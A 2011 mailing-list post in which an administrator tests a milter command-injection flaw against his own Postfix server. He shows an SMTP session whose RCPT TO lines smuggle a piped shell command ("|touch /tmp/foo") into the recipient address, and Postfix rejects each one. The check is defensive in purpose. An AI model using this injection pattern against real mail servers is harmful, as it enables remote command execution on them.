* Mark Martinec <mark.martinec...@ijs.si>:
> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> > Does this affect sendmail as well as postfix? I assume so,
> > but wanted an explicit confirmation.
>
> Yes, the security hole is entirely within the milter,
> independent of the MTA.

I tried the exploit and it seems that Postfix' restrictions that check
for FQDN address and correct recipient syntax prevent the exploit from
getting through:

telnet mail.example.de 25
220 mail.example.de ESMTP Postfix
HELO foo
250 mail.example.de
MAIL FROM:<>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
QUIT
221 2.0.0 Bye

Can anyone confirm this?

p@rick

--
state of mind
Digitale Kommunikation

http://www.state-of-mind.de

Franziskanerstraße 15      Telefon +49 89 3090 4664
81669 München              Telefax +49 89 3090 4666

Amtsgericht München        Partnerschaftsregister PR 563